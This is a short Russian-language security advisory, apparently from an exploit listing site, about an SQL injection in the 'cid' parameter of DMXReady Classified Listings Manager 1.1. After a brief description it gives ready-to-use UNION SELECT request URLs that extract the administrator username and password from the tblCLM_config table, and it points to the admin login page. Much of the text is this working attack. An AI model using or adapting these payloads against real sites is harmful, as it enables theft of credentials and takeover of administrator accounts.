Программа: DMXReady Classified Listings Manager 1.1

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «cid» сценарием /upload_image_category.asp.
Удаленный пользователь может с помощью специально сформированного запроса
выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

http://[target]/[path]//admin/ClassifiedListingsManager/components/CategoryManager/upload_image_category.asp?cid=[SQL
Inject]

USERNAME:

/admin/ClassifiedListingsManager/components/CategoryManager/upload_image_category.asp?cid=5
union select 0,Security_AdminUserName,2,5,9,3 from tblCLM_config

PASSWORD:

/admin/ClassifiedListingsManager/components/CategoryManager/upload_image_category.asp?cid=5
union select 0,Security_AdminPassword,2,5,9,3 from tblCLM_config

ADMIN LOGIN:

http://[target]/[path]//admin/ClassifiedListingsManager/manage.asp



Оставить мнение